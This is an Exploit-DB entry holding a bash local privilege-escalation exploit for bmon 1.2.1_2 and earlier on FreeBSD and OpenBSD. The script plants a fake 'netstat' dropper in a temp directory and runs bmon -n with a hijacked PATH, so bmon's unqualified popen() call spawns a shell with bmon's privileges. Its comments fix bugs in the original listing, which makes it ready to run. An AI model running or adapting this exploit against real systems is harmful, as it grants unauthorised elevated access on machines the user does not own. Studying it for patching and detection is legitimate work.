BSD bmon <= 1.2.1_2 - Local Exploit

Type exploitdb
Reporter Idan Nahoum
Modified 2004-10-16T00:00:00


BSD bmon <= 1.2.1_2 Local Exploit. Local exploit for bsd platform


# Written by Idan Nahoum.
# local exploit for FreeBSD/OpenBSD with bmon <= 1.2.1_2 installed.
# when bmon is executed with the -n parameter it popen()s an external helper
# (this note originally said "netcat"; the dropper planted below is named
# "netstat", which is what the code actually relies on) without giving an
# absolute path, so the lookup follows the caller's PATH.
# some BSDs are configured with ACLs that do not allow setuid files to run
# except those that are explicitly allowed, so creating a file called netstat
# that chmod's +s bash would not work; bash needs to be run directly by bmon,
# which uses ncurses, so to get a usable shell we need to redirect stdout to
# stderr (stdout is closed) and restore the stty settings afterwards.

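# --- configuration ----------------------------------------------------------
# PATH is saved now because bmon is later run with a PATH that contains only
# the dropper directory; the spawned shell restores this value so that normal
# commands resolve again.
declare -r SPATH="${PATH}"
declare -r STTY_EXEC="$(command -v stty)"
# Terminal state is captured up front so it can be put back after bmon's
# ncurses UI exits. Empty when stty is missing or stdin is not a terminal
# (stderr is silenced deliberately for that case).
declare -r STTY_SETTINGS="$([ -n "${STTY_EXEC}" ] && "${STTY_EXEC}" -g 2>/dev/null)"
# Shell named in the header comment; the script as written never uses it.
declare -r QSHELL="/usr/local/bin/bash"
declare BMON_EXEC="/usr/local/sbin/bmon"
workdir=""

# Restore the terminal and remove the dropper directory on every exit path.
# (The original saved the stty settings but never restored them.)
cleanup() {
  if [ -n "${STTY_SETTINGS}" ]; then
    "${STTY_EXEC}" "${STTY_SETTINGS}"
  fi
  if [ -n "${workdir}" ]; then
    rm -rf -- "${workdir}"
  fi
}
trap cleanup EXIT

echo "$0 <path to bmon> [default: ${BMON_EXEC}]"

[ "$#" -gt 0 ] && BMON_EXEC="${1}"

# A missing or non-executable target is fatal: nothing below makes sense
# without it (the original only printed a message and carried on).
if [ ! -x "${BMON_EXEC}" ]; then
  echo "${BMON_EXEC} not found" >&2
  exit 1
fi

# Use a private, unpredictable directory instead of a fixed name in /tmp, so
# another local user cannot pre-plant or swap the dropper. The template form
# works with both BSD and GNU mktemp.
workdir="$(mktemp -d "${TMPDIR:-/tmp}/bmon.XXXXXX")" || {
  echo "mktemp failed" >&2
  exit 1
}
# The directory must be traversable by whatever uid bmon ends up running as;
# it stays non-writable for everyone but us, which is what matters here.
chmod 755 "${workdir}"

# bmon apparently closes stdout, so the shell it spawns gets its stdout
# redirected to stderr (the terminal). The here-document is terminated here;
# the original listing lacked its EOF line, which made the shell treat the
# rest of the script as part of the dropper instead of executing it.
cat > "${workdir}/netstat" <<EOF
#!/bin/sh
PATH="${SPATH}" /bin/sh 1>&2
EOF
chmod 755 "${workdir}/netstat"

echo "trying to exploit"
# Only the dropper directory is on PATH, so popen()'s unqualified lookup of
# "netstat" resolves to our file. bmon itself is invoked by the path given
# (possibly relative), which is why the script no longer cd's away from the
# caller's directory first.
PATH="${workdir}" "${BMON_EXEC}" -n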

# [2004-10-16]